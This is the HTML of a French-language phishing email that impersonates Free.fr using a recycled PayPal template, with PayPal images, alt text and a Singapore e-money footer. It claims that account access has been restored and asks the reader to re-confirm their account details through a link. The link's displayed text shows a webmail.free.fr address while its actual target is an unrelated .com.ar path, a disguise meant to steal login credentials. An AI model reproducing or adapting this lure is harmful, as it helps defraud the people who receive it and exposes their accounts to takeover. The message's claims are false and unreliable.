<body>







<table border="0" cellpadding="0" cellspacing="0" Cleaned="font-family: Arial,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 12px; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none; color: rgb(51, 51, 51);" width="580">



	<tr valign="top">



		<td colspan="3">



		<table border="0" cellpadding="0" cellspacing="0" width="100%">



			<tr valign="top">



				<td Cleaned="height: 83px">



				<a target="_blank" href="http://portail.free.fr/" target="_blank">



				<img alt="PayPal" border="0" height="83" src="http://img38.imageshack.us/img38/213/logooe.gif" width="206" /></a></td>



			</tr>



			<tr>



				<td>



				<img alt="" border="0" height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" /></td>



			</tr>



			<tr>



				<td></td>



			</tr>



		</table>



		</td>



	</tr>



	<tr>



		<td colspan="3">



		<img alt="" border="0" height="13" src="http://images.paypal.com/en_US/i/scr/scr_emailTopCorners_580wx13h.gif" /></td>



	</tr>



	<tr>



		<td Cleaned="border-left: 1px solid rgb(221, 221, 221);" width="12">&nbsp;</td>



		<td class="ecxcontentArea" Cleaned="padding: 12px; width: 530px; word-wrap: break-word;" width="530">



		<table width="100%">



			<tr>



				<td>



				<h2 class="style1">L'acc&egrave;s a votre compte Free.fr est totalement restaur&egrave;</h2>



				</td>



				<td Cleaned="padding: 4px 0pt 0pt 10px; font-size: 12px; text-align: right; vertical-align: top;">



				</td>



			</tr>



		</table>



		<p></p>



		<p>Bonjour ,</p>



		<p>Nous avions restaur&egrave; l&#39;acc&egrave;s a votre compte. </p>



		<!--



.ExternalClass .ecxhowTo ol



{margin-left:0;padding:4px 0 4px 20px;}



.ExternalClass .ecxhowTo ul



{margin-left:0;padding:4px 0 4px 20px;}



.ExternalClass .ecxhowTo ol li



{margin-left:0;padding-left:0;}



.ExternalClass .ecxhowTo ul li



{margin-left:0;padding-left:0;}



		.style1 {



			font-size: 16px;



			color: rgb(255, 0, 0);



		}



		-->



		<table border="0" cellpadding="10" cellspacing="0" class="ecxhowTo" width="100%">



			<tr>



				<td Cleaned="background-color:#F2F2F2;: Arial,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 12px; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;">



				<p>Nous avons maintenant besoin que vous confirmez a nouveau Les informations de votre compte 



				chez Free.fr&nbsp;.<br>Veuillez suivre les &egrave;tapes suivant :</p>



				<ol>



					<li>Cliquez sur le lien ci-dessous pour ouvrir une fenetre 



					s&egrave;curiser.</li>



					<li>Confirmez que vous etes le titulaire du compte, puis 



					suivez les instructions.</li>



				</ol>



				<p Cleaned="height: 15px">



				<font color="#FF0000">Le lien :</font><font color="#0000FF">



&nbsp;&nbsp;<a target="_blank" target=_blank href="http://www.consultpyme.com.ar/tmp/images/free.fr">http://webmail.free.fr/webmail/fr_FR/confirmation_id=45665FD.html</a></p>



				</td>



			</tr>



		</table>



		<p>Votre patience et vos efforts permettent d'accroitre la s&egrave;curit&egrave; de toute notre communaut&egrave; d'utilisateurs.</a></p>



		</td>



		<td Cleaned="border-right: 1px solid rgb(221, 221, 221);" width="12">&nbsp;</td>



	</tr>



	<tr>



		<td colspan="3">



		<img alt="" border="0" height="13" src="http://images.paypal.com/en_US/i/scr/scr_emailBottomCorners_580wx13h.gif" /></td>



	</tr>



</table>



<table id="ecxemailFooter" border="0" cellpadding="0" cellspacing="0" Cleaned="padding-top: 20px; font-family: Arial,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 11px; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none; color: rgb(51, 51, 51);" width="580">



	<tr>



		<td>



		<div class="ecxfooterLinks" Cleaned="padding: 0pt;">



			<p class="ecxxptFooter">Veuillez ne pas r&egrave;pondre a cet email. Les 



			messages recus a cette adresse ne sont pas lus et ne recoivent donc 



			aucune r&egrave;ponse.</p>



			<hr width="400" /><span class="ecxxptFooter">Copyright @ 1999-2010  



			Free.fr. Tous droits r&egrave;serv&egrave;s.<br />



			<br />



			Avis aux consommateurs - Free.fr Pte. Ltd., d&egrave;tenteur de la fonction 



			de porte-monnaie &egrave;lectronique de Free.fr<br />



			n&#39;est pas soumis a l&#39;approbation des autorit&egrave;s mon&egrave;taires de 



			Singapore.<br />



		Nous invitons les utilisateurs a lire attentivement les Conditions 



			g&egrave;n&egrave;rales.<br />



			&nbsp;</span></div>



		</td>



	</tr>



</table>







</body>







</html>

